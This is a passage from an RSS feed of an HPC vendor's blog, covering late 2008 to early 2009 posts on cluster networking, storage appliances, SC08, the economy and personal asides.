      <pubDate>Thu, 08 Jan 2009 18:38:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/cluster-10gbe-still-in-the-future/</guid>
      <description>John West at InsideHPC asks about 10 GbE on clusters. The point I made (in two posts), and we verify every time we spec a system out for a customer, is that 10 GbE is still priced higher per port than IB. This doesn&amp;rsquo;t mean we don&amp;rsquo;t like 10GbE. On the contrary, it is simpler/easier to deal with. But it comes at a price penalty, and a non-trivial one at that.</description>
    </item>
    
    <item>
      <title>OT:  flash plugin for 64 bit firefox on linux works well</title>
      <link>https://blog.scalability.org/2009/01/ot-flash-plugin-for-64-bit-firefox-on-linux-works-well/</link>
      <pubDate>Wed, 07 Jan 2009 12:35:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/ot-flash-plugin-for-64-bit-firefox-on-linux-works-well/</guid>
      <description>No, this is not the nswrapperplugin thunking layer thing that lets you run 32 bit NSAPI plugins on 64 bit linux. While that is a neat tool, it was prone to lots of crashing. No, this is an adobe native implementation of flash. I don&amp;rsquo;t have to kill npviewer.bin after/during firefox anymore. I don&amp;rsquo;t have to see large greyed out boxes when npviewer.bin crashes. This is good.
Flash now works right &amp;hellip; only took adobe 3 years after getting flash on Linux to get 64 bit basically right.</description>
    </item>
    
    <item>
      <title>Question for accelerator users or those thinking of using accelerators</title>
      <link>https://blog.scalability.org/2009/01/question-for-accelerator-users-or-those-thinking-of-using-accelerators/</link>
      <pubDate>Wed, 07 Jan 2009 00:06:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/question-for-accelerator-users-or-those-thinking-of-using-accelerators/</guid>
      <description>Ok, this is somewhat business related, I want to have a sense of what it is would make the most sense for you to have. For example, there are nice CUBLAS libs now. And some FFT implementations. What else do people need? Are you adopting an accelerator platform because the tools you need are there? Or are you resisting adopting the platform because of missing tools? What platforms are you looking at adopting and why?</description>
    </item>
    
    <item>
      <title>OT:  root canal</title>
      <link>https://blog.scalability.org/2009/01/ot-root-canal/</link>
      <pubDate>Wed, 07 Jan 2009 00:02:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/ot-root-canal/</guid>
      <description>Went in for my root canal today. Took them 7 X-tips to numb me up. Last week they tried preping the area and 10 didn&amp;rsquo;t do it (and that is the limit). Turns out they didn&amp;rsquo;t hit the right spot. They had to drill deep to get it. For those who don&amp;rsquo;t know, X-tip is wonderful. Though it hurts for 2-3 seconds as they drill and start depositing the anesthetic. That and it leaves an awful taste.</description>
    </item>
    
    <item>
      <title>Rumors of rumors ...</title>
      <link>https://blog.scalability.org/2009/01/rumors-of-rumors/</link>
      <pubDate>Mon, 05 Jan 2009 18:07:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/rumors-of-rumors/</guid>
      <description>/. has a link to a Microsoft RIF rumor. And I heard from a number of sources about a big blue RIF.
I have heard from a number of sources of rumors at Dell and others. AMD lost quite a few, including the father of the stream benchmark. There are likely others out there I haven&amp;rsquo;t covered/mentioned.</description>
    </item>
    
    <item>
      <title>Color me impressed</title>
      <link>https://blog.scalability.org/2009/01/color-me-impressed/</link>
      <pubDate>Mon, 05 Jan 2009 05:17:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/color-me-impressed/</guid>
      <description>Ok &amp;hellip; I had gone off on the OFED build/installation scripts for v1.3 and before, noting that it required that I do lots of patching, as the build environment &amp;hellip; basically wrappers around rpmbuild, made distro specific assumptions. I don&amp;rsquo;t have a problem with using rpmbuild. RPMs annoy me in general, as they have been little more than a moving target, and sadly rendered effectively incompatible across distros. Not just the binary ones, but the source RPMs are very hard to build on any but the target distro.</description>
    </item>
    
    <item>
      <title>banned word lists ... maybe we need them in HPC?</title>
      <link>https://blog.scalability.org/2009/01/banned-word-lists-maybe-we-need-them-in-hpc/</link>
      <pubDate>Mon, 05 Jan 2009 04:20:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/banned-word-lists-maybe-we-need-them-in-hpc/</guid>
      <description>Saw this mentioned all over the web &amp;hellip; Quite a few of them are good. I like the &amp;ldquo;not so much&amp;rdquo; phrase though &amp;hellip; sad to see it in need of banning. I liked the carbon footprint explanation. What a business model &amp;hellip;
heh &amp;hellip; Ok. What words should we ban in HPC? Back when I was at SGI, we used to make fun of the marketeers with their &amp;ldquo;breakthrough&amp;rdquo;. Hence, I nominate &amp;ldquo;breakthrough&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>RAID != backup</title>
      <link>https://blog.scalability.org/2009/01/raid-backup/</link>
      <pubDate>Fri, 02 Jan 2009 17:35:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/raid-backup/</guid>
      <description>(for my fortran bretheren, != -&amp;gt; .ne. ) On /. is an object lesson in what not to do for valuable data. Backups are important. This cannot be stressed enough.
More to the point, there are many things that are not backups. Snapshots come to mind. Yet we see people use them in this manner. In this day and age with &amp;ldquo;dedup&amp;rdquo; the fad d&amp;rsquo;jour (all it does is make each block that much more valuable, and important not to have go away &amp;hellip;) backup is ever more important.</description>
    </item>
    
    <item>
      <title>An enjoyable read ...</title>
      <link>https://blog.scalability.org/2009/01/an-enjoyable-read/</link>
      <pubDate>Thu, 01 Jan 2009 20:25:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/an-enjoyable-read/</guid>
      <description>This presentation on diversity in HPC. Diversity of HPC &amp;hellip; machines, OSes, architectures &amp;hellip; and comments from the author. Very good read. Did I mention it was good?</description>
    </item>
    
    <item>
      <title>blasting through heavy loads ...</title>
      <link>https://blog.scalability.org/2008/12/blasting-through-heavy-loads/</link>
      <pubDate>Wed, 31 Dec 2008 20:24:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/blasting-through-heavy-loads/</guid>
      <description>Previously I had told you about octobonnie. 8 simultaneous bonnies run locally to beat the heck out of our servers. If we are going to catch a machine based problem, it will likely show up under this wilting load. But while that is a heavy load, it is nothing like what we have going on now.
I am sitting here in the office monitoring one of our boxes being tested by a customer before they put it into production (oil and gas market), as they load it from their cluster.</description>
    </item>
    
    <item>
      <title>Happy new year to all!</title>
      <link>https://blog.scalability.org/2008/12/happy-new-year-to-all/</link>
      <pubDate>Wed, 31 Dec 2008 19:58:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/happy-new-year-to-all/</guid>
      <description>Ok, a little early for those in NA, but late for those in Oz and about past it for India, but as you can see from WorldTimeZone, its coming to europe/mid-africa as I write this&amp;hellip;. happy new years to you all</description>
    </item>
    
    <item>
      <title>I saw a link to this, this evening</title>
      <link>https://blog.scalability.org/2008/12/i-saw-a-link-to-this-this-evening/</link>
      <pubDate>Tue, 30 Dec 2008 06:09:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/i-saw-a-link-to-this-this-evening/</guid>
      <description>The ruins of Detroit. Look for the Michigan Central Rail Road station, and see if you recognize this from the recent Transformers movie. The building is near Mexican Town, south-ish of the old Tiger Stadium.</description>
    </item>
    
    <item>
      <title>This is not the right direction ...</title>
      <link>https://blog.scalability.org/2008/12/this-is-not-the-right-direction/</link>
      <pubDate>Tue, 30 Dec 2008 04:54:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/this-is-not-the-right-direction/</guid>
      <description>&amp;hellip; a weak dollar is a good dollar. Makes our exports more desireable.
[ ](http://finance.yahoo.com/q/bc?s=USDGBP=X&amp;amp;t=1y&amp;amp;l=on&amp;amp;z=m&amp;amp;q=l&amp;amp;c=)
From Yahoo, linked back to the page. Really, we need that dollar lower. Makes exporters happy.</description>
    </item>
    
    <item>
      <title>Pure unabridged speculation ... guessing really on my part</title>
      <link>https://blog.scalability.org/2008/12/pure-unabridged-speculation-guessing-really-on-my-part/</link>
      <pubDate>Tue, 30 Dec 2008 03:35:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/pure-unabridged-speculation-guessing-really-on-my-part/</guid>
      <description>Ok. I read something while I was semi-concious during my recent defeat at the hands of a 72 hour bug (that positively whupped me upside the head, stomach and other parts). I read Cisco is coming out with blade servers. Ok. Here is the 2 + 2 = 3 moment. Yeah, assume I am off the mark. Pure speculation. Shai, feel free to tell me here that I am full of it.</description>
    </item>
    
    <item>
      <title>The economy and HPC:  part 2</title>
      <link>https://blog.scalability.org/2008/12/the-economy-and-hpc-part-2/</link>
      <pubDate>Tue, 30 Dec 2008 03:13:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-economy-and-hpc-part-2/</guid>
      <description>Ok, so the last post left you feeling like you should just spin up some Pink Floyd on the turntable &amp;hellip; er &amp;hellip; ok &amp;hellip; I am dating myself here (turntable? sheesh). What I posited in the last post was that HPC has value. And it should be treated as such. But I also noted a few things.
First: Short term credit for business is pretty much non-existent. This impacts all HPC providers, smaller ones with fewer capital reserves harder than larger ones with capital reserves.</description>
    </item>
    
    <item>
      <title>The economy and HPC: part 1</title>
      <link>https://blog.scalability.org/2008/12/the-economy-and-hpc/</link>
      <pubDate>Tue, 30 Dec 2008 01:36:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-economy-and-hpc/</guid>
      <description>John West at InsideHPC.com covers a very important issue &amp;hellip; that being the meltdown of the economy, and its impact upon HPC, specifically HPC expenditure. Being on the vendor side of this I can offer my observations and make some suggestions.
First, allow me to note something that might not be too obvious to those in academia or government labs. There is no credit in the market. There is effectively zero ability to borrow new capital to fund parts purchases for HPC vendors outside of their existing credit facilities.</description>
    </item>
    
    <item>
      <title>The beatings will continue until morale improves ...</title>
      <link>https://blog.scalability.org/2008/12/the-beatings-will-continue-until-morale-improves/</link>
      <pubDate>Mon, 29 Dec 2008 21:52:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-beatings-will-continue-until-morale-improves/</guid>
      <description>Noooooooooooooooooooooooooooooooooo!!!! [whimper] [update] Mitch Albom goes a bit further. Says what needs to be said.</description>
    </item>
    
    <item>
      <title>we&#39;re back!!!</title>
      <link>https://blog.scalability.org/2008/12/were-back/</link>
      <pubDate>Mon, 29 Dec 2008 21:27:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/were-back/</guid>
      <description>yup &amp;hellip; a nice little down time courtesy of business class internet with SLAs &amp;hellip; even though this is the home office, still &amp;hellip; annoying. Considering rehosting at work &amp;hellip;</description>
    </item>
    
    <item>
      <title>under the weather ...</title>
      <link>https://blog.scalability.org/2008/12/under-the-weather/</link>
      <pubDate>Sun, 28 Dec 2008 02:29:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/under-the-weather/</guid>
      <description>&amp;hellip; which is why I haven&amp;rsquo;t commented on a number of interesting things. Hope to return to full capability over the next few days. Some bug decided to kick me hard a few hours after I wrote the previous post. Rehydrating and recovering.</description>
    </item>
    
    <item>
      <title>The night before xmas</title>
      <link>https://blog.scalability.org/2008/12/the-night-before-xmas/</link>
      <pubDate>Wed, 24 Dec 2008 18:33:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-night-before-xmas/</guid>
      <description>Twas the night before xmas, and all through the HPC solutions house, the disks were moving, just not the mouse &amp;hellip; The workers had gone home to their families, and shipped the last JackRabbit of the year, while the benchmarker cackled and tuned, making the ΔV faster.</description>
    </item>
    
    <item>
      <title>Initial ΔV4 numbers</title>
      <link>https://blog.scalability.org/2008/12/initial-v4-numbers/</link>
      <pubDate>Thu, 18 Dec 2008 23:50:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/initial-v4-numbers/</guid>
      <description>Thought a few people would like to see this. 8GB RAM machine, 24 drives, 36TB raw, 31.5 raw after RAID6 with 1 hot spare. 29TB usable (there is some serious rounding error in many of the tools as I have discovered last night :( 1 TiB = 1.0995 1TB, and 29T = 31.8 TB &amp;hellip; go figure &amp;hellip;)
root@dv4:~# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/md0 29T 24G 29T 1% /data and the file root@dv4:~# ls -alFh /data/big.</description>
    </item>
    
    <item>
      <title>This is ... a ... good ... idea ... ???</title>
      <link>https://blog.scalability.org/2008/12/this-is-a-good-idea/</link>
      <pubDate>Thu, 18 Dec 2008 13:47:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/this-is-a-good-idea/</guid>
      <description>[
](http://www.theregister.co.uk/2008/12/16/windows_for_submarines_rollout/) the line about &amp;ldquo;almost never need to give their command systems autonomous firing authority&amp;rdquo; does little to comfort me. Given the apparent ease at which external regimes can crack into the US DoD machines via virus/malware on windows systems &amp;hellip; this &amp;hellip; well &amp;hellip; doesn&amp;rsquo;t strike me as the smartest idea I have ever heard. It gives the phrase &amp;ldquo;blue screen of death&amp;rdquo; a whole new, and quite unwelcome, meaning.</description>
    </item>
    
    <item>
      <title>I keep forgetting why RBLs are such a bad idea ....</title>
      <link>https://blog.scalability.org/2008/12/i-keep-forgetting-why-rbls-are-such-a-bad-idea/</link>
      <pubDate>Tue, 16 Dec 2008 16:10:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/i-keep-forgetting-why-rbls-are-such-a-bad-idea/</guid>
      <description>Oh yeah. Thats why. Thanks AT&amp;amp;T;, we really appreciate it.</description>
    </item>
    
    <item>
      <title>Whats more frightening ...</title>
      <link>https://blog.scalability.org/2008/12/whats-more-frightening/</link>
      <pubDate>Tue, 16 Dec 2008 14:04:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/whats-more-frightening/</guid>
      <description>The insecurity and potential compromise of serious and exploitable &amp;ldquo;mis-feature&amp;rdquo; in a browser (causing the browser maker to suggest using a competitive browser platform), or the security theatre at all of the banks we deal with who write their web pages specifically for that browser, so that no other browsers will work properly with it, regardless of platform, and whose representitives insist in meetings with you that they are indeed secure &amp;hellip; see the little lock they ask me derisively?</description>
    </item>
    
    <item>
      <title>Missing functionality finally added</title>
      <link>https://blog.scalability.org/2008/12/missing-functionality-finally-added/</link>
      <pubDate>Tue, 16 Dec 2008 03:02:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/missing-functionality-finally-added/</guid>
      <description>I have commented in the past on the &amp;hellip; er &amp;hellip; uh &amp;hellip; missing 64 bit Java plugins for Linux and other OSes. Well, Sun appears to have finally addressed this. Good job Sun. Better (6 years) late than never.</description>
    </item>
    
    <item>
      <title>Power outage at day job</title>
      <link>https://blog.scalability.org/2008/12/power-outage-at-day-job/</link>
      <pubDate>Sun, 14 Dec 2008 15:59:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/power-outage-at-day-job/</guid>
      <description>Some sort of fire at a local substation knocked power offline. Mail may bounce &amp;hellip; my apologies. Will try to re-route to here for the moment until we can get power restored. I have to verify that the building owner will allow generators on the premises &amp;hellip; [update] power is back up. New generator sitting in the loading bay area. Manual setup when we need it. Not needed now as the power came back on just when we were delivering the generator.</description>
    </item>
    
    <item>
      <title>GPU-HMMer is released</title>
      <link>https://blog.scalability.org/2008/12/gpu-hmmer-is-released/</link>
      <pubDate>Sun, 14 Dec 2008 02:56:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/gpu-hmmer-is-released/</guid>
      <description>From the mailing list &amp;hellip;</description>
    </item>
    
    <item>
      <title>Sun closes Network.com to new users ...</title>
      <link>https://blog.scalability.org/2008/12/sun-closes-networkcom-to-new-users/</link>
      <pubDate>Wed, 10 Dec 2008 05:38:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/sun-closes-networkcom-to-new-users/</guid>
      <description>The Register has an article on this. As I noted in the previous post (the linked article really), ASP reborn is a hard model to make work. You have to deliver what customers want, and do so inexpensively.
Amazon is succeeding at this in spades. Sun originally had the right idea &amp;hellip; then someone decided to make Network.com into a massive Solaris marketing tool rather than a resource you could run what you needed.</description>
    </item>
    
    <item>
      <title>Cloud computing article up on Linux Magazine</title>
      <link>https://blog.scalability.org/2008/12/cloud-computing-article-up-on-linux-magazine/</link>
      <pubDate>Wed, 10 Dec 2008 02:20:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/cloud-computing-article-up-on-linux-magazine/</guid>
      <description>My article on Cloud Computing is up. Only one equation. I promise!</description>
    </item>
    
    <item>
      <title>Co-inky-dink (coincidence)?</title>
      <link>https://blog.scalability.org/2008/12/co-inky-dink-coincidence/</link>
      <pubDate>Mon, 08 Dec 2008 16:09:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/co-inky-dink-coincidence/</guid>
      <description>Every now and then we look to see how people have found our web site. Usually a search engine is involved. So today, I found someone googling &amp;ldquo;JackRabbit Delta-V&amp;rdquo; and thought &amp;ldquo;Hey, people are starting to get to know our product names!&amp;rdquo; I&amp;rsquo;d been worried as I had discovered shortly after we got our trademarks on JackRabbit, that Apache has a &amp;ldquo;JackRabbit&amp;rdquo; project.
No overlap, I am not worried about brand dilution.</description>
    </item>
    
    <item>
      <title>Why ... oh why ... will I never learn ...</title>
      <link>https://blog.scalability.org/2008/12/why-oh-why-will-i-never-learn/</link>
      <pubDate>Mon, 08 Dec 2008 00:34:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/why-oh-why-will-i-never-learn/</guid>
      <description>Working on a proposal document for a (prospective) customer. In some things Word is a little smarter than OO3. I did most of the spreadsheet work on OO3 and saved the excel document. Started the proposal in OO3 as well. Thought, to myself &amp;hellip; &amp;ldquo;ok, why not boot the laptop into windows and use Word&amp;rdquo;. After all, it won&amp;rsquo;t bite me in the rear &amp;hellip; hah hah &amp;hellip; it would never do that &amp;hellip; and like &amp;hellip; I dunno &amp;hellip; FAIL TO SAVE &amp;hellip; and then CRASH after it FAILS TO SAVE &amp;hellip; thus taking hours of work down with it.</description>
    </item>
    
    <item>
      <title>I loved the headline ...</title>
      <link>https://blog.scalability.org/2008/12/i-loved-the-headline/</link>
      <pubDate>Thu, 04 Dec 2008 23:43:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/i-loved-the-headline/</guid>
      <description>The day job showed up on the local news, Great Lakes IT report. I loved the title &amp;hellip; Huge New Storage Machines From Canton Firm FWIW: WWJ is the local AM radio station (950AM) that my car radio is tuned to about 1/2 the time. :)</description>
    </item>
    
    <item>
      <title>Mmmmm .... coffee .... mmmmm</title>
      <link>https://blog.scalability.org/2008/12/mmmmm-coffee-mmmmm/</link>
      <pubDate>Wed, 03 Dec 2008 01:49:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/mmmmm-coffee-mmmmm/</guid>
      <description>well &amp;hellip; er &amp;hellip; ah &amp;hellip; ok.
mmmmmm &amp;hellip;. coffee &amp;hellip;. mmmmmm &amp;hellip; well &amp;hellip; its Nescafe &amp;hellip; not Kona. So maybe not really coffee &amp;hellip; Being a former computational physics type, I had to warm my coffee on the processors &amp;hellip;</description>
    </item>
    
    <item>
      <title>Announcing ΔV</title>
      <link>https://blog.scalability.org/2008/12/announcing-v/</link>
      <pubDate>Wed, 03 Dec 2008 00:30:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/announcing-v/</guid>
      <description>Have a look here for the PDF version, or below for the text version. ** Scalable Informatics Enables Companies To Do More While Spending Less With Low-Cost High Performance Storage Appliances** Canton, MI - December 2, 2008 - Scalable Informatics (www.scalableinformatics.com), provider of high performance computing and storage solutions, announced the introduction of Delta-V, their latest storage appliance providing outstanding performance and reliability at an exceptional price.
A Delta-V 3 unit was demonstrated at SC08, the international conference for high performance computing, networking, storage and analysis, in downtown Austin in mid-November, 2008 in support of Pervasive Software.</description>
    </item>
    
    <item>
      <title>New day job web site ... check it out!</title>
      <link>https://blog.scalability.org/2008/12/new-day-job-web-site-check-it-out/</link>
      <pubDate>Wed, 03 Dec 2008 00:21:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/new-day-job-web-site-check-it-out/</guid>
      <description>Doug has been trying to convince me that he could do a better job with the CMS tools and some cranking out basic design (I like simple &amp;hellip;), than I could at hacking code. Have a look here. The JackRabbit site was also folded in The (now former) website we had up was an MVC based application using Catalyst. I used jQuery for the effects &amp;hellip; yadda yadda yadda.
This meant I coded it.</description>
    </item>
    
    <item>
      <title>The Register on Sun:  whats a company to do?</title>
      <link>https://blog.scalability.org/2008/12/the-register-on-sun-whats-a-company-to-do/</link>
      <pubDate>Tue, 02 Dec 2008 14:46:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-register-on-sun-whats-a-company-to-do/</guid>
      <description>A good read over at the Register on the trials and tribulations at Sun. Yeah, I know, shortly after I post this, our sites are gonna get DDoSed. Seems to happen all the time (any post that doesn&amp;rsquo;t paint Sun as a glowing ball of hot plasma &amp;hellip; seems to disagree with some groups out there). The basic premise is that Sun is in the not so enviable position of its valuation being approximately equal to its pile of cash.</description>
    </item>
    
    <item>
      <title>Competitive benchmarks</title>
      <link>https://blog.scalability.org/2008/12/competitive-benchmarks/</link>
      <pubDate>Tue, 02 Dec 2008 14:07:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/competitive-benchmarks/</guid>
      <description>Ok, we wouldn&amp;rsquo;t benchmark these machines in quite the way these folks did, but there are some useful nuggets within. Also, these folks appear to be skirting the &amp;ldquo;do not talk about Nehalem performance&amp;rdquo; requirement of getting early access Nehalem. See this link. The interesting benchmarks show up around page 9. Interesting though, regardless. Java people ought to love Shanghai. Not to many others though. And the Nehalem performance &amp;ldquo;hints&amp;rdquo; left one&amp;rsquo;s jaw on the floor.</description>
    </item>
    
    <item>
      <title>Another Paul Graham piece worth a read</title>
      <link>https://blog.scalability.org/2008/12/another-paul-graham-piece-worth-a-read/</link>
      <pubDate>Tue, 02 Dec 2008 01:31:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/another-paul-graham-piece-worth-a-read/</guid>
      <description>Paul Graham writes quite a few essays. Some are ok, some are really good. This is one of the latter. With a slight rewording, I can replace placing &amp;ldquo;checks&amp;rdquo; on &amp;ldquo;programmers&amp;rdquo; to introducing &amp;ldquo;barriers&amp;rdquo; to &amp;ldquo;HPC consumers&amp;rdquo;. Seriously, his statement on costs is quite consistent with a dictum I often mutter &amp;hellip; er &amp;hellip; say: Every decision has a cost.
A decision to use a certain prescribed subset of vendors guarantees you will not get the benefits of an open collection set of vendors.</description>
    </item>
    
    <item>
      <title>MSFT Vista</title>
      <link>https://blog.scalability.org/2008/12/msft-vista/</link>
      <pubDate>Mon, 01 Dec 2008 13:28:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/msft-vista/</guid>
      <description>I read a/. linked blog on ComputerWorld.UK this morning. In it was a most amusing characterization of Vista:
The post goes on to suggest that upgrades are over as a business. I am not convinced this is true, but their point is that things like OpenOffice are pretty good. Well, yes. OO3 is actually quite good. I use it on Linux, on Windows. Even on Vista (long story, daughters future laptop &amp;hellip; shhh &amp;hellip; don&amp;rsquo;t tell her &amp;hellip; would like to get her using Linux, maybe we will &amp;hellip; lets see).</description>
    </item>
    
    <item>
      <title>An interesting yet fictional cautionary tale</title>
      <link>https://blog.scalability.org/2008/11/an-interesting-yet-fictional-cautionary-tale/</link>
      <pubDate>Sat, 29 Nov 2008 15:34:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/an-interesting-yet-fictional-cautionary-tale/</guid>
      <description>From TheFunded.com: Link to original is here. It starts out like this &amp;hellip;
I recommend reading it all. It reminds me as similar to Arthur C Clarke&amp;rsquo;s short story &amp;ldquo;Superiority&amp;rdquo;. A different side of this. [Update] I just noticed that the link doesn&amp;rsquo;t show all the text. It is supposed to be public. So I will reproduce it here.</description>
    </item>
    
    <item>
      <title>Motherboards</title>
      <link>https://blog.scalability.org/2008/11/motherboards/</link>
      <pubDate>Thu, 27 Nov 2008 16:18:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/motherboards/</guid>
      <description>One thing we continuously struggle with are users who decide to get the lowest cost (and often lowest quality) motherboards. You wind up spending so much extra time/effort to get these things to work correctly, that it completely overwhelms any cost savings you may have even thought to realize by buying them. Have one of these now. System refuses to boot a more modern kernel &amp;hellip; some driver somewhere hangs. This isn&amp;rsquo;t our system, we wouldn&amp;rsquo;t sell MBs like this.</description>
    </item>
    
    <item>
      <title>Roundup of OSS cluster stacks:  please let me know what you use</title>
      <link>https://blog.scalability.org/2008/11/roundup-of-oss-cluster-stacks-please-let-me-know-what-you-use/</link>
      <pubDate>Wed, 26 Nov 2008 18:04:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/roundup-of-oss-cluster-stacks-please-let-me-know-what-you-use/</guid>
      <description>I am looking at new cluster stacks for a number of reasons. We have one internally (Tiburon) which is quite flexible and powerful, but I don&amp;rsquo;t want to push it out just yet (have some additional bits to deal with). I&amp;rsquo;d like to hear what people are using out there. Ones I am not interested in are Rocks and derivatives, Oscar. I am interested in xCAT2, and any others out there as stacks.</description>
    </item>
    
    <item>
      <title>When &#34;communities&#34; pick their friends and enemies</title>
      <link>https://blog.scalability.org/2008/11/when-communities-pick-their-friends-and-enemies/</link>
      <pubDate>Wed, 26 Nov 2008 17:59:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/when-communities-pick-their-friends-and-enemies/</guid>
      <description>I recently had a run in with one of the &amp;ldquo;leaders&amp;rdquo; of a cluster management system. This person decided I went over the line in reporting on a security issue, our forensics, and how to go about helping prevent it in the future. Previously, I had been warned for daring to point to a benchmark document. Despite being a contributer to and a supporter of this technology, this offering, having written articles on it for magazine publication, having helped many customers use it &amp;hellip; this &amp;ldquo;leader&amp;rdquo; decided that I had crossed a line.</description>
    </item>
    
    <item>
      <title>The elements of success in accelerator technology</title>
      <link>https://blog.scalability.org/2008/11/the-elements-of-success-in-accelerator-technology/</link>
      <pubDate>Mon, 24 Nov 2008 21:03:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/the-elements-of-success-in-accelerator-technology/</guid>
      <description>Some time ago, I had posited that the right approach to building a viable business in accelerators was to target ubiquity. It is worth revisiting some of this and delving into how to make accelerator use painless.
Basically, for people to get real value out of accelerators, they have to provide enough benefit over the life of the host platform such that the investment can be recouped. This is the fundamental raison d&amp;rsquo;etre for accelerators.</description>
    </item>
    
    <item>
      <title>SC08: the wrap up (probably part 1)</title>
      <link>https://blog.scalability.org/2008/11/sc08-the-wrap-up-probably-part-1/</link>
      <pubDate>Sun, 23 Nov 2008 13:56:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-the-wrap-up-probably-part-1/</guid>
      <description>SC08 has been over for a few days. I have multiple impressions, and will try to outline them here. Please post your impressions as well. First: Being in Pervasive Software&amp;rsquo;s booth was great. They are a great group, with an interesting product. As they noted, most HPC is not Java, and they get that it won&amp;rsquo;t be for the forseeable future. That said, I think they got lots of good feedback from potential consumers of their product.</description>
    </item>
    
    <item>
      <title>SC08: Day 2, as the market tumbles ...</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-2-as-the-market-tumbles/</link>
      <pubDate>Thu, 20 Nov 2008 05:10:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-2-as-the-market-tumbles/</guid>
      <description>One of the aspects about being on a show floor all day, talking to partners, and prospective customers, is that you sort of have to ignore whats going on around you in the market outside of the walls of the center. The stock market closed below 8000 today. Some of the more traditional HPC stocks have been whalloped. Like SGI. On a day when the market dropped 5%, they dropped 16.</description>
    </item>
    
    <item>
      <title>SC08:  Day 1 ... more detailed video for DataRush</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-1-more-detailed-video-for-datarush/</link>
      <pubDate>Wed, 19 Nov 2008 05:55:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-1-more-detailed-video-for-datarush/</guid>
      <description></description>
    </item>
    
    <item>
      <title>SC08:  Day wrap-up</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-wrap-up/</link>
      <pubDate>Wed, 19 Nov 2008 05:17:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-wrap-up/</guid>
      <description>I saw many things at SC08 &amp;hellip; first off, most of the people we saw running disks were running some sort of multi-pipe direct attached storage with RAID0&amp;rsquo;s. Yeah, this shows bandwidth real well. Not how users really run them, but it shows some nice inflated numbers. Compare this with a RAID10 running over a single iSCSI 10 GbE connection. Most folks are used to slow iSCSI, and can&amp;rsquo;t believe our numbers, until they see them.</description>
    </item>
    
    <item>
      <title>SC08: Day 1, Fixstars and Terrasoft</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-1-fixstars-and-terrasoft/</link>
      <pubDate>Wed, 19 Nov 2008 04:56:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-1-fixstars-and-terrasoft/</guid>
      <description>Fixstars is there with its recent acquisition of Terrasoft. Fixstars makes very interesting Cell accelerator cards, and we can place them into units like Pegasus for deskside, and JackRabbit and ΔV for server applications. This looks to be the first viable Cell accelerator card. Terrasoft was pretty good with the OS/tools side of things, so hopefully the combination of these two will result in good challenger to GPUs. Pricing is close to where it needs to be.</description>
    </item>
    
    <item>
      <title>SC08:  Day 1, mpi-HMMer and its GPU port are generating excitement</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-1-mpi-hmmer-and-its-gpu-port-are-generating-excitement/</link>
      <pubDate>Wed, 19 Nov 2008 04:52:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-1-mpi-hmmer-and-its-gpu-port-are-generating-excitement/</guid>
